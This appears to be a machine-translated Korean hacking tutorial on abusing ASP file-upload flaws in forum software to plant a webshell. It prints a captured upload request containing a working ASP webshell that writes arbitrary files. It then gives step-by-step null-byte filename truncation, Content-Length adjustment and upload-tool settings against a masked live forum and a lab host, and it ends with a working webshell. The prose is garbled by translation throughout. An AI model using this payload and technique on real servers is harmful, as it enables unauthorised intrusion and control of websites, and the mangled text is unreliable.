사례 분석 ASP 업로드 구멍 침입 실전 및 확장

[구멍 사기 기술 업로드]
인터넷 상에 서 많은 프로그램 들 이 올 라 오 는 구멍 이 있다.예 를 들 어 내 가 전체 역 프로그램,역 동적 인 쇼핑 몰,추 엽 쇼핑 몰,혜 신 뉴스 시스템 등 이다.본 고 는 주로 허점 을 올 린 침입 실전 과 확장 이용 에 대해 설명 한다.우선 클 라 이언 트 와 서버 간 에 전 달 된 데 이 터 를 얻 고 ASP 목 마 를 미리 준비 해서 업로드 할 준 비 를 해 야 합 니 다.물론 성공 할 수 없습니다.저희 가 원 하 는 것 은 이 중간 에 서버 에 제출 한 데이터 입 니 다.일반적으로 WsockExpert 로 데 이 터 를 얻 습 니 다.데이터 가 너무 많 기 때문에 관건 적 인 부분 을 다음 과 같이 보 낼 수 밖 에 없습니다.
　　POST /bbs/upfile.asp HTTP/1.1
　　……. N 을 생략 했 어 요.쓸데없는 정보.
Content-Length: 1792Connection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN-----------------------------7d52191850242Content-Disposition: form-data; name="filepath"
uploadFace-----------------------------7d52191850242Content-Disposition: form-data; name="act"
upload-----------------------------7d52191850242Content-Disposition: form-data; name="file1"; filename="E:\\목마\asp\셸.asp"콘 텐 츠 유형: text/plain
＜% dim objFSO %＞＜% dim fdata %＞＜% dim objCountFile %＞＜% on error resume next %＞＜% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %＞＜% if Trim(request("syfdpath"))＜＞"" then %＞＜% fdata = request("cyfddata") %＞＜% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %＞＜% objCountFile.Write fdata %＞＜% if err =0 then %＞＜% response.write "＜font color=red＞＜h2＞성공!＜/h2＞＜font＞" %＞＜% else %＞＜% response.write "＜font color=red＞＜h1＞실패!＜/h1＞＜/font＞" %＞＜% end if %＞＜% err.clear %＞＜% end if %＞＜% objCountFile.Close %＞＜% Set objCountFile=Nothing %＞＜% Set objFSO = Nothing %＞＜% Response.write "＜form action='''' method=post＞" %＞＜% Response.write "댓 글 저장＜글꼴 color=red＞예 를 들 어 D:\웹\x.asp＜/font＞" %＞＜% Response.Write "＜input type=text name=syfdpath width=32 size=50＞" %＞＜% Response.Write "＜br＞" %＞＜% Response.write "주소 %＞＜% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %＞＜% Response.write "＜br＞" %＞＜% Response.write "당신 의 댓 글:" %＞＜% Response.write "＜textarea name=cyfddata cols=80 rows=10 width=32＞＜/textarea＞" %＞＜% Response.write "＜input type=submit value=sky!!＞" %＞＜% Response.write "＜/form＞" %＞
-----------------------------7d52191850242Content-Disposition: form-data; name="fname"
E:\\목마\asp\셸.asp------------------------------------------------------------------------------ form-data; name="Submit"
업로드--------------7d 52191850242--
전달 한 정 보 를 얻 었 습 니 다.사기 목적 으로 수정 하 겠 습 니 다.주로 몇 가 지 를 수정 합 니 다.
　　1.Content-Disposition: form-data; name="file1"; filename="E:\\목마\asp\셸.asp"
　　2.Content-Disposition: form-data; name="fname"
E:\목마\asp\셸.asp
3.가장 중요 한 점 은 Content-Disposition: form-data; name="filepath"아래 값 을 수정 해 야 합 니 다.upload Face\셸.asp 로 수정 한 다음 에 빈 문 자 를 어떻게 추가 합 니까?UltraEdit 을 사용 하 는 것 은 좋 은 방법 입 니 다.16 진법 으로 편집 합 니 다.('\0'이라는 문자 도 한 자 리 를 차지 하기 때문에 우 리 는 먼저 빈 칸 을 넣 은 다음 에 UltraEdit(Ctrl+H 로 16 진법 으로 전환)에서 빈 칸 의 20 을 00 으로 바 꿉 니 다.
4.또 한 가지 수정 해 야 할 부분 이 있 습 니 다.바로 이 Content-Length 입 니 다. 1792 는 데 이 터 를 제출 하 는 문자 개 수 를 나타 낸다.
filepath 의 값 을 수정 했다 면 이 길 이 는 1792 도 바 꿔 야 합 니 다.한 글자 나 숫자의 길 이 는 1 입 니 다.맨 뒤에 있 는 빈 칸 도 1 이라는 것 을 잊 지 마 세 요.
[허점 실전 업로드!] 
우 리 는 먼저 구멍 난 원조 동 망 포럼 으로 실전 을 치 르 자.원 리 를 보면 올 릴 때 데 이 터 를 수정 하고 캡 처 해 야 하기 때문에 인터넷 에 많은 도구 가 나 왔 다.이제 우 리 는 노병 의 업로드 도구 로 복잡 한 절 차 를 간단하게 하고 몇 개의 데이터 만 수정 하면 된다.다음 그림 1 과 같이 이 도구 의 인 터 페 이 스 를 봅 시다.
그림 1 노병 업로드 도구 인터페이스
도구 의 사용법 을 말씀 드 리 겠 습 니 다.
Action 에 빈 파일 을 업로드 할 URL 을 입력 하 십시오:  http://target.net/bbs/UpFile.asp ；UpPath 의 첫 번 째 텍스트 상자 에 있 는 FilePath 는 폼 에 있 는 FilePath,즉 업로드 경로 입 니 다.같은 번호 뒤에 상대방 서버 에 올 린 뒷문 의 이름/shell.asp 를 입력 합 니 다.WEB 프로그램 이 업로드 할 수 있 는 형식 텍스트 상자 에 기본 JPG 를 입력 하면 됩 니 다(일반 사이트 에 서 는 JPG 그림 파일 을 업로드 할 수 있 습 니 다).File 의 첫 번 째 텍스트 상자 에 있 는 File1 은 폼 에 있 는 File1 입 니 다.등호 뒤에 이 컴퓨터 에 올 릴 목마 경 로 를 입력 하 십시오.Cookies 에는 WsockExpert 가 캡 처 한 Cookies 값 과 같은 패 킷 캡 처 도구 가 적 혀 있 습 니 다.시스템 에 등 록 된 Cookies 값 을 기억 하 세 요.
여 기 는 우리 가 인터넷 포럼 에 침입 한 것 을 예 로 들 면 여기 Action:입력http://www.****.com/bbs/upfile.asp;UpPath 첫 번 째 텍스트 상자 입력:filepath;두 번 째 입력:/shell.asp(당신 도/bbs/shell.asp 를 쓸 수 있 습 니 다.이렇게 업로드 에 성공 하면/bbs 로 전 달 됩 니 다. 목록 아래!)WEB 프로그램 이 업로드 할 수 있 는 형식의 텍스트 상자 에 기본 JPG 를 입력 하면 됩 니 다.File 첫 번 째 텍스트 상자 입력:file 1;두 번 째 입력:E:\목마\asp\셸.asp (이 ASP 목 마 는 자신의 기계 에 있 는 경로 입 니 다.뒤에 있 는 파일 을 누 르 고 아이콘 을 열 어 ASP 목 마 를 찾 으 면 됩 니 다.)
Cookies:여 기 는 가방 을 잡 을 필요 가 없습니다.왜냐하면 여기 올 라 오 는 것 은 Cookie 를 감지 하지 않 기 때 문 입 니 다.없 으 면 틀 릴 거 야.다 쓰 면'Submit'버튼 눌 러 서 제출 해!
그림 2 업로드 성공 알림
Submit 단 추 를 누 르 면 브 라 우 저 로 직접 방문 하 는 것 이 좋 습 니 다.프로그램 에 도 오보 가 있 을 수 있 습 니 다.우 리 는 브 라 우 저 로 방문 합 니 다.
그림 3 을 보시 면 올 라 왔 습 니 다.
다음 단 계 는 강력 한 기능 을 가 진 목 마 를 써 서 더 이상 깊이 들 어가 지 않 는 다 는 것 이다.
[빈틈 실전 확장 업로드] 
동 망 에 만 업로드 구멍 이 있 는 것 이 아니 라 인터넷 에 많은 프로그램 들 이 이 구멍 을 가지 고 있 습 니 다.업로드 구멍 의 원리 와 마찬가지 로 파악 한 후에 자 유 롭 게 발휘 할 수 있 고 구체 적 으로 프로그램 코드 를 보고 결정 할 수 있 습 니 다.다음은 조 객 포럼 을 예 로 들 어 허점 을 올 리 는 애플 리 케 이 션 을 확장 해 보 겠 습 니 다.먼저 정상 적 인 사용 자 를 등록 하고 로그 인 한 다음 에 업로드 페이지 주 소 를 찾 습 니 다.http://192.168.1.3/3/upload.asp?uppath=forum&upname=&uptext=jk_word소스 코드 는 다음 과 같 습 니 다.
＜FORM name=form1 action=?action=upfile method=post encType=multipart/form-data＞＜INPUT type=hidden value=forum name=up_path＞＜INPUT type=hidden value=200593075710 name=up_name＞＜INPUT type=hidden value=jk_word name=up_text＞ ＜INPUT type=file size=40 name=file_name1＞＜INPUT type=submit value=업로드 클릭 name=submit＞
--------------------------------------------------------------------------------
소스 코드 를 보면 노병 이 도구 에 올 리 면 우리 가 어떻게 작성 해 야 하 는 지 알 수 있 을 것 이다.Action 에 입력:http://192.168.1.3/3/upload.asp?action=upfile UpPath첫 번 째 텍스트 상자 에 입력:upname；두 번 째 에 업 로드 된 SHELL 이름 셸.asp 를 입력 하 십시오.File 첫 번 째 텍스트 상자 에 file 입력name 1,두 번 째 는 이 기계 의 목마 파일 입 니 다.COOKIES 는 여기 서 스냅 백 으로 얻 은 COOKIES 값 을 작성 합 니 다.WsockExpert 로 캡 처 한 Cookies 정 보 를 반드시 작성 해 야 합 니 다.그 주요 기능 은 검증 하 는 것 입 니 다!그림:
그림 4 설정 그림
모두 설정 한 후 Submit 단 추 를 누 르 면 업로드 가 성공 한 것 을 볼 수 있 습 니 다.브 라 우 저 를 열 어 성공 여 부 를 확인 하 십시오.그림 과 같 습 니 다.
그림 5 업로드 성공
이로써 웹 셸 을 성공 적 으로 얻 었 습 니 다.이렇게 간단 합 니 다.중요 한 것 은 우리 의 생각 이 유연 해 야 하고 시스템 에 업로드 구멍 이 있 는 지 잘 발견 해 야 합 니 다.물론 웹 셸 을 받 은 후에 당신 이 무엇 을 할 수 있 는 지 는 서버 의 안전 설정 과 개인 수준 에 달 려 있 습 니 다.여 기 는 토론 하지 않 습 니 다.